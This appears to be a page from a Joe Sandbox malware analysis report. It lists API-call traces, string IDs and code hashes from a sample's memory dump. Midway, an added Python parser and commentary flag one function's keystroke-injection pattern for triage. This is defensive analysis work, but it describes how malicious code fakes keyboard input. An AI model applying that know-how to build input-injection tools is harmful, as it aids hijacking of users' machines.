• API String ID: 2449869053-4083010176
• Opcode ID: 178b694003ef1c8c6ddf6c03964e3c93f4f33891ff2eeadba8088ba5e41252f8
• Instruction ID: 8919579e2c9fc9b2d94c4928dd3202a5bdd7863bc063e44bf2a6fba2f1eed130
• Opcode Fuzzy Hash: 178b694003ef1c8c6ddf6c03964e3c93f4f33891ff2eeadba8088ba5e41252f8
• Instruction Fuzzy Hash: 2351BF756002049FCB00EFA4C985A9EB7B4EF88304F14856EFD05AB392DB79ED45CB99
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 3e9aeaa8e8d9a9efa26880ce8322a829618f36bb2b0e75f2f32cf9c77c57eef6
                                                                                                                                                    • Instruction ID: 5d193f65ffce5f3a1406795a0d9a37a93f2f4887bdc9b14e5c8c629f49d9966a
                                                                                                                                                    • Opcode Fuzzy Hash: 3e9aeaa8e8d9a9efa26880ce8322a829618f36bb2b0e75f2f32cf9c77c57eef6
                                                                                                                                                    • Instruction Fuzzy Hash: 0A413871900114ABE710DF58CC84FAF7765EB46320F14826EF858AB3C1C7745D02EB98
                                                                                                                                                    APIs
                                                                                                                                                    • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004488BD
                                                                                                                                                    • SendMessageW.USER32(?,00000469,?,00000000), ref: 004488D3
                                                                                                                                                    • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                                                                                                                    • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                                                                                                                    • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                                                                                                                    • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                                                                                                                    • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Window$Enable$Show$MessageMoveSend
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 896007046-0
                                                                                                                                                    • Opcode ID: 487afd455632248a3d509b30b3d46b8f07dcfb1983bcccedac1426ad742150ab
                                                                                                                                                    • Instruction ID: 578be1c3660e2fd518c7beccd973f741d6ce186f3db94e5441c29ef1e5fc56da
                                                                                                                                                    • Opcode Fuzzy Hash: 487afd455632248a3d509b30b3d46b8f07dcfb1983bcccedac1426ad742150ab
                                                                                                                                                    • Instruction Fuzzy Hash: 5F419D742003809FF724DB24C894BAB77E0FF96305F18446EF5859B291DB78A845CB59
                                                                                                                                                    APIs
                                                                                                                                                    • SendMessageW.USER32(?,00000401,?,00000000), ref: 00448AC9
                                                                                                                                                    • GetFocus.USER32 ref: 00448ACF
                                                                                                                                                    • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                                                                                                                    • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                                                                                                                    • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                                                                                                                    • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                                                                                                                    • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Window$Enable$Show$FocusMessageSend
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3429747543-0
                                                                                                                                                    • Opcode ID: 611a307e80107d343a79f7fc2cfd1bfbec1158008c6b2b7743f92638a6db6fc0
                                                                                                                                                    • Instruction ID: 6f3afe48a64986b2df7f4b22be5166ca64fe0b5af1f2aee4406df3dc20f3ce1d
                                                                                                                                                    • Opcode Fuzzy Hash: 611a307e80107d343a79f7fc2cfd1bfbec1158008c6b2b7743f92638a6db6fc0
                                                                                                                                                    • Instruction Fuzzy Hash: F331C4706043805BF7248F24CCC8BAFB7D4FB95305F08491EF581A6291DBBCA845CB59
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00401B80: _wcsncpy.LIBCMT ref: 00401C41
                                                                                                                                                      • Part of subcall function 00401B80: _wcscpy.LIBCMT ref: 00401C5D
                                                                                                                                                      • Part of subcall function 00401B80: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401C6F
                                                                                                                                                    • KillTimer.USER32(?,?,?,?,?), ref: 004012D3
                                                                                                                                                    • SetTimer.USER32(?,?,000002EE,00000000), ref: 004012E2
                                                                                                                                                    • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 0042730F
                                                                                                                                                    • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 00427363
                                                                                                                                                    • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 004273AE
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: IconNotifyShell_$Timer$Kill_wcscpy_wcsncpy
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3300667738-0
                                                                                                                                                    • Opcode ID: 98bdb4639f13a2aff9c284aaa5c14a4e0db979becac89074174bb9299657736d
                                                                                                                                                    • Instruction ID: ad6fff92b80ef16b1053521cf30c66606da497e43c90b6e238f917110e524b22
                                                                                                                                                    • Opcode Fuzzy Hash: 98bdb4639f13a2aff9c284aaa5c14a4e0db979becac89074174bb9299657736d
                                                                                                                                                    • Instruction Fuzzy Hash: AF31EA70604259BFDB16CB24DC55BEAFBBCBB02304F0000EAF58CA3291C7741A95CB9A
                                                                                                                                                    APIs
                                                                                                                                                    • SetErrorMode.KERNEL32(00000001), ref: 0045D459
                                                                                                                                                    • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D4CF
                                                                                                                                                    • __swprintf.LIBCMT ref: 0045D4E9
                                                                                                                                                    • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D52D
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorMode$InformationVolume__swprintf
                                                                                                                                                    • String ID: %lu$\VH
                                                                                                                                                    • API String ID: 3164766367-2432546070
                                                                                                                                                    • Opcode ID: 886de82fe176795aba7bdb97f378ec25336d41d961a023bcb5d27bbb6add7ed5
                                                                                                                                                    • Instruction ID: a5bcfc38f1a54d16d783223dfbe865d4bc924dff4e6617147b97584b2165572c
                                                                                                                                                    • Opcode Fuzzy Hash: 886de82fe176795aba7bdb97f378ec25336d41d961a023bcb5d27bbb6add7ed5
                                                                                                                                                    • Instruction Fuzzy Hash: 11317171A00209AFCB14EF95DD85EAEB7B8FF48304F1084AAF905A7291D774EA45CB94
                                                                                                                                                    APIs
                                                                                                                                                    • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00450BE7
                                                                                                                                                    • SendMessageW.USER32(00000000,00000409,00000000,FF000000), ref: 00450BF8
                                                                                                                                                    • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00450C06
                                                                                                                                                    • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00450C17
                                                                                                                                                    • SendMessageW.USER32(00000000,00000404,00000001,00000000), ref: 00450C25
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
Similarity
• API ID: MessageSend
• String ID: Msctls_Progress32
• API String ID: 3850602802-3636473452
APIs
Similarity
• API ID: Destroy$DeleteImageList_ObjectWindow$Icon
• String ID:
• API String ID: 3985565216-0
APIs
• _malloc.LIBCMT ref: 0041F707
  • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
  • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
  • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
• _free.LIBCMT ref: 0041F71A
Strings
Similarity
• API ID: AllocateHeap_free_malloc
• String ID: [B
• API String ID: 1020059152-632041663
APIs
  • Part of subcall function 00436B19: GetProcessHeap.KERNEL32(00000008,0000000C,00436C79), ref: 00436B1D
  • Part of subcall function 00436B19: HeapAlloc.KERNEL32(00000000), ref: 00436B24
• GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 00436C88
• GetCurrentProcess.KERNEL32(?,00000000), ref: 00436C91
• DuplicateHandle.KERNEL32(00000000,?,00000000), ref: 00436C9A
• GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00000000), ref: 00436CA6
• GetCurrentProcess.KERNEL32(?,00000000,?,00000000), ref: 00436CAF
• DuplicateHandle.KERNEL32(00000000,?,00000000,?,00000000), ref: 00436CB2
• CreateThread.KERNEL32(00000000,00000000,Function_00036C2B,00000000,00000000,00000000), ref: 00436CCA
Similarity
• API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
• String ID:
• API String ID: 1957940570-0
APIs
• GetClientRect.USER32(?,?), ref: 004302E6
• GetWindowRect.USER32(00000000,?), ref: 00430316
• GetClientRect.USER32(?,?), ref: 00430364
• GetSystemMetrics.USER32(0000000F), ref: 004303B1
• GetWindowRect.USER32(?,?), ref: 004303C3
• ScreenToClient.USER32(?,?), ref: 004303EC
Similarity
• API ID: Rect$Client$Window$MetricsScreenSystem
• String ID:
• API String ID: 3220332590-0
APIs
Similarity
• API ID: _malloc_wcslen$_strcat_wcscpy
• String ID:
• API String ID: 1612042205-0
APIs
Strings
Similarity
• API ID: _memmove_strncmp
• String ID: >$U$\
• API String ID: 2666721431-237099441
APIs
• GetKeyboardState.USER32(?), ref: 0044C570
• SetKeyboardState.USER32(00000080), ref: 0044C594
• PostMessageW.USER32(?,00000100,?,?), ref: 0044C5D5
• PostMessageW.USER32(?,00000104,?,?), ref: 0044C60D
• PostMessageW.USER32(?,00000102,?,00000001), ref: 0044C62F
• SendInput.USER32(00000001,?,0000001C), ref: 0044C6C2
Memory Dump Source
• Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_x.jbxd
Similarity
• API ID: MessagePost$KeyboardState$InputSend
• String ID:
• API String ID: 2221674350-0
• Opcode ID: 253f2b6e14f8b29283c151e9eff2603b50f4fedb3541a599f467ca45a100d6c4
• Instruction ID: 625ea0eb49cc588760ebb6bc0eb208289033378f73eea84c13a2ca11a8b118cf
• Opcode Fuzzy Hash: 253f2b6e14f8b29283c151e9eff2603b50f4fedb3541a599f467ca45a100d6c4
• Instruction Fuzzy Hash: D1514A725001187AEB109FA99C81BFFBB68AF9E311F44815BFD8496242C379D941CBA8
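The record above is the one function in this dump that fabricates keyboard input rather than observing it: it reads and rewrites the keyboard state table (GetKeyboardState/SetKeyboardState), posts the message triple a real keypress produces (uMsg 0x100 = WM_KEYDOWN, 0x104 = WM_SYSKEYDOWN, 0x102 = WM_CHAR, values from winuser.h) and falls back to SendInput with cbSize 0x1C, which is sizeof(INPUT) on 32-bit Windows. The following parser is an added example, not part of the Joe Sandbox report or its tooling: it reads the "APIs" lines of a record as they appear in this page (the sample input is copied from the record above), decodes the keyboard messages and applies a triage heuristic for keystroke synthesis. The message table, the API names and the verdict thresholds are my own choices. Treat the verdict as a triage hint only: the same call pattern is what a benign UI-automation or scripting runtime's "send keys" routine looks like, so it should be read together with the report's Yara and keylogger signatures rather than on its own.

```python
import re
from dataclasses import dataclass

# Constructed sample: the "APIs" lines of the keystroke-synthesis record above,
# copied from the report text. The trailing header shows where a record ends;
# it is not an API call and the parser must skip it.
SAMPLE_RECORD = """\
APIs
• GetKeyboardState.USER32(?), ref: 0044C570
• SetKeyboardState.USER32(00000080), ref: 0044C594
• PostMessageW.USER32(?,00000100,?,?), ref: 0044C5D5
• PostMessageW.USER32(?,00000104,?,?), ref: 0044C60D
• PostMessageW.USER32(?,00000102,?,00000001), ref: 0044C62F
• SendInput.USER32(00000001,?,0000001C), ref: 0044C6C2
Memory Dump Source
"""

# One API line in the report: "• Name.MODULE(arg,arg,...), ref: 0044C570"
API_LINE = re.compile(
    r"^\s*•\s*(?P<name>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)

# Keyboard window messages (winuser.h); uMsg is the 2nd argument of Post/SendMessage.
KEY_MESSAGES = {
    0x100: "WM_KEYDOWN",
    0x101: "WM_KEYUP",
    0x102: "WM_CHAR",
    0x104: "WM_SYSKEYDOWN",
    0x105: "WM_SYSKEYUP",
}


@dataclass
class ApiCall:
    name: str
    module: str
    args: list
    ref: int


def parse_api_lines(text):
    """Return the ApiCall entries of one record; lines that are not API calls are skipped."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        raw = m.group("args")
        args = [a.strip() for a in raw.split(",")] if raw else []
        calls.append(ApiCall(m.group("name"), m.group("module"), args, int(m.group("ref"), 16)))
    return calls


def decode_key_message(call):
    """Name of the keyboard message a Post/SendMessage call carries, else None.
    A '?' argument means the sandbox could not resolve the value statically."""
    if call.name not in ("PostMessageW", "SendMessageW", "PostMessageA", "SendMessageA"):
        return None
    if len(call.args) < 2 or call.args[1] == "?":
        return None
    return KEY_MESSAGES.get(int(call.args[1], 16))


def classify_keystroke_synthesis(calls):
    """Triage heuristic (my own threshold): the function fabricates keyboard input when it
    both tampers with the keyboard state table and emits key messages or SendInput."""
    names = {c.name for c in calls}
    key_msgs = [m for m in (decode_key_message(c) for c in calls) if m]
    state_tamper = {"GetKeyboardState", "SetKeyboardState"} <= names
    send_input = "SendInput" in names
    verdict = "synthetic keystroke injection" if (key_msgs or send_input) and state_tamper else "no finding"
    return {
        "keyboard_state_tamper": state_tamper,
        "send_input": send_input,
        "key_messages": key_msgs,
        "verdict": verdict,
    }


if __name__ == "__main__":
    parsed = parse_api_lines(SAMPLE_RECORD)
    for c in parsed:
        print(f"{c.ref:08X} {c.name}.{c.module}({', '.join(c.args)}) -> {decode_key_message(c)}")
    print(classify_keystroke_synthesis(parsed))
```

To run it over the whole report, split the page text on the "APIs" header so each record is classified separately; a function that only calls SendMessageW with list-view or tab-control messages (as the later records in this section do) yields "no finding", which is the intended behaviour.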
APIs
Memory Dump Source
• Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_x.jbxd
Similarity
• API ID: _wcscpy$_wcscat
• String ID:
• API String ID: 2037614760-0
• Opcode ID: cc5f24ba9fb77c1fb1fe1c0710fcc73dec9ab40ad7bfe8f9893d0625b32ee804
• Instruction ID: 99b1098f8f7a3a84d55f117cb3556dd5d93458401dda30520ad7f1c57b96c0d6
• Opcode Fuzzy Hash: cc5f24ba9fb77c1fb1fe1c0710fcc73dec9ab40ad7bfe8f9893d0625b32ee804
• Instruction Fuzzy Hash: 0741357190011466DB34EF5998C1BFF7368EFE6314F84455FFC4287212DB2DAA92C2A9
APIs
• GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
• VariantCopy.OLEAUT32(?,?), ref: 00451BF8
• VariantCopy.OLEAUT32(-00000068,?), ref: 00451C0E
• VariantCopy.OLEAUT32(-00000088,?), ref: 00451C27
• VariantClear.OLEAUT32(-00000058), ref: 00451CA1
• SysAllocString.OLEAUT32(00000000), ref: 00451CBA
Memory Dump Source
• Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_x.jbxd
Similarity
• API ID: Variant$Copy$AllocClearErrorLastString
• String ID:
• API String ID: 960795272-0
• Opcode ID: 218b2f6110521206867dfa84a42cd28f2b67ec3390fd0729a790b06cd777bcc7
• Instruction ID: e234943060a9aef7ccdf580943a4f321f6ba3cfb1df2bc58669f78ff50eabc4c
• Opcode Fuzzy Hash: 218b2f6110521206867dfa84a42cd28f2b67ec3390fd0729a790b06cd777bcc7
• Instruction Fuzzy Hash: C751AE719042099FCB14DF65CC84BAAB7B4FF48300F14856EED05A7361DB79AE45CBA8
                                                                                                                                                    APIs
                                                                                                                                                    • BeginPaint.USER32(00000000,?), ref: 00447BDF
                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 00447C5D
                                                                                                                                                    • ScreenToClient.USER32(?,?), ref: 00447C7B
                                                                                                                                                    • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C8E
                                                                                                                                                    • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447CD5
                                                                                                                                                    • EndPaint.USER32(?,?), ref: 00447D13
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Paint$BeginClientRectRectangleScreenViewportWindow
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 4189319755-0
                                                                                                                                                    • Opcode ID: 0de1757924998e3fd5473b1ac31060e8ba53e31114793872216692834f921a18
                                                                                                                                                    • Instruction ID: 4e3fb435071a661ad846631c1082d1486cc319c76cae6976ccfd06e2d512f03c
                                                                                                                                                    • Opcode Fuzzy Hash: 0de1757924998e3fd5473b1ac31060e8ba53e31114793872216692834f921a18
                                                                                                                                                    • Instruction Fuzzy Hash: DC417F706042019FE310DF14D8C4F7B7BA8EB86724F14466EF9A487391CB74A806CB69
                                                                                                                                                    APIs
                                                                                                                                                    • SendMessageW.USER32(?,00001024,00000000,00000000), ref: 0044908B
                                                                                                                                                    • SendMessageW.USER32(?,00000409,00000000,?), ref: 0044909F
                                                                                                                                                    • SendMessageW.USER32(?,0000111E,00000000,00000000), ref: 004490B3
                                                                                                                                                    • InvalidateRect.USER32(?,00000000,00000001,?,0000111E,00000000,00000000,?,00000409,00000000,?), ref: 004490C9
                                                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 004490D4
                                                                                                                                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 004490E1
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageSend$LongWindow$InvalidateRect
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1976402638-0
                                                                                                                                                    • Opcode ID: 2001084b9f030ce18b996af9061ac6ceee4bb7592284355317d8a12df4a6bddd
                                                                                                                                                    • Instruction ID: 8674d855734444f977eaeabaa32478bd653fbe911923e0a4a3d3eb28cec46bd0
                                                                                                                                                    • Opcode Fuzzy Hash: 2001084b9f030ce18b996af9061ac6ceee4bb7592284355317d8a12df4a6bddd
                                                                                                                                                    • Instruction Fuzzy Hash: 2531E135240104AFF724CF48DC89FBB77B9EB49320F10851AFA559B290CA79AD41DB69
                                                                                                                                                    APIs
                                                                                                                                                    • ShowWindow.USER32(?,00000000), ref: 00440A8A
                                                                                                                                                    • EnableWindow.USER32(?,00000000), ref: 00440AAF
                                                                                                                                                    • ShowWindow.USER32(?,00000000), ref: 00440B18
